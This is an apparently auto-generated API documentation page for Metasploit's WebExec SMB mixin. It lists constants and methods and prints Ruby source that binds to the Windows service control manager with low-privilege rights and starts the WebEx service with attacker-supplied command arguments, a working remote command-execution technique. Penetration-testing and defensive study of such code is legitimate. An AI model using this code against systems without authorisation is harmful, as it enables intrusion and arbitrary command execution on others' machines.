Module: Msf::Exploit::Remote::SMB::Client::WebExec

Includes:
Failure, DCERPC, Authenticated, Windows_Constants
Defined in:
lib/msf/core/exploit/smb/client/webexec.rb

Overview

Makes use of a WebEx service vulnerability that works similarly to psexec.

This code was stolen straight out of the psexec module which was stolen from the standalone Psexec tool. Thanks very much for all who contributed to that module!! Instead of uploading and running a binary.

Constant Summary

Constants included from Msf::Exploit::Remote::SMB::Client

CONST, DCERPCClient, DCERPCPacket, DCERPCResponse, DCERPCUUID, NDR, SIMPLE, XCEPT

Constants included from DCERPC

DCERPC::DCERPCClient, DCERPC::DCERPCPacket, DCERPC::DCERPCResponse, DCERPC::DCERPCUUID, DCERPC::NDR

Constants included from DCERPC_LSA

DCERPC_LSA::NDR

Constants included from DCERPC_MGMT

DCERPC_MGMT::NDR

Constants included from Windows_Constants

Windows_Constants::CHANGE_SERVICE_CONFIG2_W, Windows_Constants::CHANGE_SERVICE_CONFIG_W, Windows_Constants::CLOSE_SERVICE_HANDLE, Windows_Constants::CONTROL_SERVICE, Windows_Constants::CREATE_SERVICE_W, Windows_Constants::DELETE_SERVICE, Windows_Constants::OPEN_SC_MANAGER_W, Windows_Constants::OPEN_SERVICE_W, Windows_Constants::QUERY_SERVICE_STATUS, Windows_Constants::SC_MANAGER_ALL_ACCESS, Windows_Constants::SC_MANAGER_CONNECT, Windows_Constants::SC_MANAGER_CREATE_SERVICE, Windows_Constants::SC_MANAGER_ENUMERATE_SERVICE, Windows_Constants::SC_MANAGER_LOCK, Windows_Constants::SC_MANAGER_MODIFY_BOOT_CONFIG, Windows_Constants::SC_MANAGER_QUERY_LOCK_STATUS, Windows_Constants::SERVICE_ACCEPT_HARDWAREPROFILECHANGE, Windows_Constants::SERVICE_ACCEPT_NETBINDCHANGE, Windows_Constants::SERVICE_ACCEPT_PARAMCHANGE, Windows_Constants::SERVICE_ACCEPT_PAUSE_CONTINUE, Windows_Constants::SERVICE_ACCEPT_POWEREVENT, Windows_Constants::SERVICE_ACCEPT_PRESHUTDOWN, Windows_Constants::SERVICE_ACCEPT_SESSIONCHANGE, Windows_Constants::SERVICE_ACCEPT_SHUTDOWN, Windows_Constants::SERVICE_ACCEPT_STOP, Windows_Constants::SERVICE_ACCEPT_TIMECHANGE, Windows_Constants::SERVICE_ACCEPT_TRIGGEREVENT, Windows_Constants::SERVICE_ACTIVE, Windows_Constants::SERVICE_ALL_ACCESS, Windows_Constants::SERVICE_AUTO_START, Windows_Constants::SERVICE_BOOT_START, Windows_Constants::SERVICE_CHANGE_CONFIG, Windows_Constants::SERVICE_CONFIG_DELAYED_AUTO_START_INFO, Windows_Constants::SERVICE_CONFIG_DESCRIPTION, Windows_Constants::SERVICE_CONFIG_FAILURE_ACTIONS, Windows_Constants::SERVICE_CONFIG_FAILURE_ACTIONS_FLAG, Windows_Constants::SERVICE_CONFIG_LAUNCH_PROTECTED, Windows_Constants::SERVICE_CONFIG_PREFERRED_NODE, Windows_Constants::SERVICE_CONFIG_PRESHUTDOWN_INFO, Windows_Constants::SERVICE_CONFIG_REQUIRED_PRIVILEGES_INFO, Windows_Constants::SERVICE_CONFIG_SERVICE_SID_INFO, Windows_Constants::SERVICE_CONFIG_TRIGGER_INFO, Windows_Constants::SERVICE_CONTINUE_PENDING, Windows_Constants::SERVICE_CONTROL_CONTINUE, Windows_Constants::SERVICE_CONTROL_DEVICEEVENT, Windows_Constants::SERVICE_CONTROL_HARDWAREPROFILECHANGE, Windows_Constants::SERVICE_CONTROL_INTERROGATE, Windows_Constants::SERVICE_CONTROL_NETBINDADD, Windows_Constants::SERVICE_CONTROL_NETBINDDISABLE, Windows_Constants::SERVICE_CONTROL_NETBINDENABLE, Windows_Constants::SERVICE_CONTROL_NETBINDREMOVE, Windows_Constants::SERVICE_CONTROL_PARAMCHANGE, Windows_Constants::SERVICE_CONTROL_PAUSE, Windows_Constants::SERVICE_CONTROL_POWEREVENT, Windows_Constants::SERVICE_CONTROL_PRESHUTDOWN, Windows_Constants::SERVICE_CONTROL_SESSIONCHANGE, Windows_Constants::SERVICE_CONTROL_SHUTDOWN, Windows_Constants::SERVICE_CONTROL_STOP, Windows_Constants::SERVICE_CONTROL_TIMECHANGE, Windows_Constants::SERVICE_CONTROL_TRIGGEREVENT, Windows_Constants::SERVICE_DEMAND_START, Windows_Constants::SERVICE_DISABLED, Windows_Constants::SERVICE_ENUMERATE_DEPENDENTS, Windows_Constants::SERVICE_ERROR_IGNORE, Windows_Constants::SERVICE_INACTIVE, Windows_Constants::SERVICE_INTERACTIVE_PROCESS, Windows_Constants::SERVICE_INTERROGATE, Windows_Constants::SERVICE_NO_CHANGE, Windows_Constants::SERVICE_PAUSED, Windows_Constants::SERVICE_PAUSE_CONTINUE, Windows_Constants::SERVICE_PAUSE_PENDING, Windows_Constants::SERVICE_QUERY_CONFIG, Windows_Constants::SERVICE_QUERY_STATUS, Windows_Constants::SERVICE_RUNNING, Windows_Constants::SERVICE_RUNS_IN_SYSTEM_PROCESS, Windows_Constants::SERVICE_START, Windows_Constants::SERVICE_START_PENDING, Windows_Constants::SERVICE_STATE_ALL, Windows_Constants::SERVICE_STOP, Windows_Constants::SERVICE_STOPPED, Windows_Constants::SERVICE_STOP_PENDING, Windows_Constants::SERVICE_SYSTEM_START, Windows_Constants::SERVICE_USER_DEFINED_CONTROL, Windows_Constants::SERVICE_WIN32_OWN_PROCESS, Windows_Constants::STANDARD_RIGHTS_REQUIRED

Instance Attribute Summary

Attributes included from Msf::Exploit::Remote::SMB::Client

#simple

Attributes included from Tcp

#sock

Attributes included from DCERPC

#dcerpc, #handle

Instance Method Summary collapse

Methods included from Msf::Exploit::Remote::SMB::Client

#connect, #domain, #domain_username_split, #smb_create, #smb_direct, #smb_enumprinters, #smb_enumprintproviders, #smb_file_exist?, #smb_file_rm, #smb_fingerprint, #smb_fingerprint_windows_lang, #smb_fingerprint_windows_sp, #smb_hostname, #smb_lanman_netshareenumall, #smb_login, #smb_lookup_share_type, #smb_netshareenumall, #smb_netsharegetinfo, #smb_open, #smb_peer_lm, #smb_peer_os, #smb_srvsvc_netshareenumall, #smb_srvsvc_netsharegetinfo, #smbhost, #splitname, #unicode

Methods included from Tcp

#chost, #cleanup, #connect, #connect_timeout, #cport, #deregister_tcp_options, #disconnect, #handler, #lhost, #lport, #peer, #print_prefix, #proxies, #rhost, #rport, #set_tcp_evasions, #shutdown, #ssl, #ssl_cipher, #ssl_verify_mode, #ssl_version

Methods included from DCERPC

#dcerpc_bind, #dcerpc_call, #dcerpc_getarch, #dcerpc_handle, #unicode

Methods included from DCERPC_LSA

#lsa_open_policy

Methods included from DCERPC_MGMT

#dcerpc_mgmt_connect, #dcerpc_mgmt_inq_if_ids, #dcerpc_mgmt_inq_if_stats, #dcerpc_mgmt_inq_princ_name, #dcerpc_mgmt_is_server_listening, #dcerpc_mgmt_stop_server_listening

Methods included from DCERPC_EPM

#dcerpc_endpoint_find_tcp, #dcerpc_endpoint_find_udp, #dcerpc_endpoint_list

Instance Method Details

#execute_single_command(command, opts) ⇒ Object


39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
# File 'lib/msf/core/exploit/smb/client/webexec.rb', line 39

def execute_single_command(command, opts)
  command = command.split(/ /)
  svc_status = opts[:svc_client].startservice(opts[:svc_handle], ["install", "software-update", "1", *command])
  case svc_status
  when ERROR_SUCCESS
    # This happens a lot, so don't print it
    # print_good("Service started successfully...")
  when ERROR_FILE_NOT_FOUND
    print_error("Service failed to start - FILE_NOT_FOUND")
  when ERROR_ACCESS_DENIED
    print_error("Service failed to start - ACCESS_DENIED")
  when ERROR_SERVICE_REQUEST_TIMEOUT
    print_good("Service start timed out")
  else
    print_error("Service failed to start, ERROR_CODE: #{svc_status}")
  end
end

#initialize(info = {}) ⇒ Object


27
28
29
30
31
32
33
34
35
36
37
# File 'lib/msf/core/exploit/smb/client/webexec.rb', line 27

def initialize(info = {})
  super
  register_options(
    [
      OptString.new('SERVICE_NAME', [ false, 'The service name', 'WebExService']),
    ], self.class)

  register_advanced_options(
    [
    ], self.class)
end

#wexec(disconnect = true) ⇒ Boolean

Executes a single windows command.

If you want to retrieve the output of your command you'll have to echo it to a .txt file and then use the #smb_read_file method to retrieve it. Make sure to remove the files manually or use FileDropper#register_files_for_cleanup to have the FileDropper#cleanup and FileDropper#on_new_session handlers do it for you.

Parameters:

  • command (String)

    Should be a valid windows command

  • disconnect (Boolean) (defaults to: true)

    Disconnect afterwards

Returns:

  • (Boolean)

    Whether everything went well


69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
# File 'lib/msf/core/exploit/smb/client/webexec.rb', line 69

def wexec(disconnect=true)
  simple.connect("\\\\#{datastore['RHOST']}\\IPC$")
  handle = dcerpc_handle('367abb81-9844-35f1-ad32-98f038001003', '2.0', 'ncacn_np', ["\\svcctl"])
  vprint_status("Binding to #{handle} ...")
  dcerpc_bind(handle)
  vprint_status("Bound to #{handle} ...")
  vprint_status("Obtaining a service manager handle...")

  svc_client = Rex::Proto::DCERPC::SVCCTL::Client.new(dcerpc)
  # This is the only permission non-admin gets on Windows 7 (and likely others)
  scm_handle, scm_status = svc_client.openscmanagerw(datastore['RHOST'], 0x00001)

  if scm_status == ERROR_ACCESS_DENIED
    print_error("ERROR_ACCESS_DENIED opening the Service Manager")
  end

  return false unless scm_handle

  # These are the best permissions I could use for a non-admin account on Windows 7
  svc_handle = svc_client.openservicew(scm_handle, datastore['SERVICE_NAME'], 0x00010)

  if svc_handle.nil?
    print_error("No service handle retrieved")
    return false
  end

  vprint_status("Starting the service...")
  begin
    yield({ :svc_client => svc_client, :svc_handle => svc_handle })
  ensure
    vprint_status("Closing service handle...")
    svc_client.closehandle(svc_handle)
  end

  if disconnect
    simple.disconnect("\\\\#{datastore['RHOST']}\\IPC$")
  end

  true
end